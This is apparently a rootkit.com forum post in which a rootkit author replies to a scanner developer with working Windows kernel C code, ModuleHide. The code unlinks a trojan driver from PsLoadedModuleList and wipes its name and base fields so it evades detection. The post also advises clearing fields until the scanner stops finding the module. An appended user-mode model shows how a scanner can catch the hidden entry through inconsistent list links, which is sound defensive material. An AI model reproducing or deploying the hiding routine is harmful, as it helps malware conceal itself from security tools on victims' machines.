ROOTKIT
Please don't greap me!
By: valerino

Ciao gianna (and ciao all),
First of all, thank you for waking up my interest in this hot summer... you know, sun, beach, etc. keep me a bit away from the keyboard.

Anyway, here's the code to defeat your scanner (as you can see, it's the standard hide routine for PsLoadedModuleList, but with a few tweaks):


//************************************************************************
// VOID ModuleHide(PDRIVER_OBJECT MyDrvObj)
//
// Hide module from PsLoadedModuleList                                                                     
//************************************************************************
VOID ModuleHide(PDRIVER_OBJECT MyDrvObj)
{
    // disable this routine on debug builds, since windbg seems to have problem loading symbols if the module is hidden :)
    // and.... do not use this routine in INIT section!!
    
    PMODULE_ENTRY pCurrentModule = NULL;
    
    // at DriverSection pointer there is PsLoadedModuleList
    pCurrentModule = *((PMODULE_ENTRY*)((DWORD)MyDrvObj->DriverSection));
    if (pCurrentModule == NULL)
        return;
    
    // We get its Flink pointer to start scan for drivername, since the head do not have a name
    pCurrentModule =  (MODULE_ENTRY*)pCurrentModule->le_mod.Flink;

    while (TRUE)
    {
        if (pCurrentModule->driver_Path.MaximumLength > 3 && pCurrentModule->driver_Path.Buffer)
        {
            if (Utilwcsstrsize(pCurrentModule->driver_Path.Buffer,
                DEFAULT_TROJAN_DRIVERNAME,pCurrentModule->driver_Path.Length,
                wcslen(DEFAULT_TROJAN_DRIVERNAME) * sizeof (WCHAR),FALSE))
            {
                // clear base and name in current module entry (to avoid raw-memory scanning)
                pCurrentModule->driver_Name.Buffer = NULL;
                pCurrentModule->driver_Path.MaximumLength = 0;
                pCurrentModule->driver_Path.Length = 0;
                pCurrentModule->base = 0;
                pCurrentModule->driver_start = 0;
                
                // clear base and name in driverobject (to avoid raw-memory scanning)
                MyDrvObj->DriverStart = 0;
                MyDrvObj->DriverName.Buffer = NULL;
                MyDrvObj->DriverName.MaximumLength = 0;
                MyDrvObj->DriverName.Length = 0;
                
                // hide
                pCurrentModule->le_mod.Blink->Flink = pCurrentModule->le_mod.Flink;
                pCurrentModule->le_mod.Flink->Blink = pCurrentModule->le_mod.Blink;
                KDebugPrint (1,("%s Module hidden from PsLoadedModuleList OK.\n",MODULE));
                break;
            }
        }
        
        // next module
        pCurrentModule = (MODULE_ENTRY*)pCurrentModule->le_mod.Flink;
    }

}


Well... there could be some other fields to clear, but basically the approach to be used against this sort of scanning is this: clear stuff until the scanner no longer recognizes your module (and the OS does not complain). If the scanner can find a field which, if mangled, leads the OS to crash, that's an effective scanner.

The ball is up to you now.....
Happy Christmas!

regards,
valerio
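The closing remark above is the defender's lever: the unlinked entry's own Flink/Blink are a field the rootkit leaves intact (the OS still uses them at unload), so a scanner that sweeps memory for entries whose links point at list nodes that no longer point back will find the module even after its name and base are scrubbed. The following is an added, user-mode C model written for this page, not code from the post or from rootkit.com; LIST_ENTRY, MODULE_ENTRY, the pool array and the module names are constructed stand-ins, not the real kernel structures.

```c
#include <stddef.h>
#include <stdint.h>
/* Kernel-style doubly linked node and a reduced module entry holding only the fields the
   post's ModuleHide touches (constructed models, not the real LDR_DATA_TABLE_ENTRY layout). */
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
typedef struct { LIST_ENTRY le_mod; uintptr_t base; const wchar_t *name; } MODULE_ENTRY;

#define NMOD 4
static LIST_ENTRY head;                 /* stands in for PsLoadedModuleList */
static MODULE_ENTRY pool[NMOD];         /* stands in for the pool memory a raw scan sweeps */
static MODULE_ENTRY *orphans[NMOD];     /* filled by find_orphans() */
static const wchar_t *names[NMOD] = { L"ntoskrnl.exe", L"hal.dll", L"evil.sys", L"tcpip.sys" };

/* Build a circular list of NMOD entries with constructed sample names and base addresses. */
void build_list(void) {
    head.Flink = head.Blink = &head;
    for (int i = 0; i < NMOD; i++) {
        pool[i].base = 0x80400000u + 0x10000u * (uintptr_t)i;
        pool[i].name = names[i];
        pool[i].le_mod.Flink = &head;       /* InsertTailList */
        pool[i].le_mod.Blink = head.Blink;
        head.Blink->Flink = &pool[i].le_mod;
        head.Blink = &pool[i].le_mod;
    }
}

/* Model of the post's hide step: unlink the entry and scrub the fields a name/base scan keys
   on. The entry's own Flink/Blink are left untouched, exactly as in the post. */
void hide_module(MODULE_ENTRY *m) {
    m->le_mod.Blink->Flink = m->le_mod.Flink;
    m->le_mod.Flink->Blink = m->le_mod.Blink;
    m->name = NULL;
    m->base = 0;
}

/* What a scanner that only walks the list from the head sees. */
int count_linked(void) {
    int n = 0;
    for (LIST_ENTRY *p = head.Flink; p != &head; p = p->Flink) n++;
    return n;
}

/* Raw-memory view: sweep the pool and flag every entry whose own links still point at list
   nodes that no longer point back to it. A scrubbed name or base does not help here. */
int find_orphans(void) {
    int n = 0;
    for (int i = 0; i < NMOD; i++) {
        LIST_ENTRY *e = &pool[i].le_mod;
        if (e->Flink->Blink != e || e->Blink->Flink != e) orphans[n++] = &pool[i];
    }
    return n;
}
```

A real scanner would locate candidate entries by pool tag or structure heuristics rather than by a fixed array, but the consistency check on the links is the same.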


recent comments:
joanna, 07 Jun 17:06: not elegant :/
Ntoskrnl, 07 Jun 15:15: =)
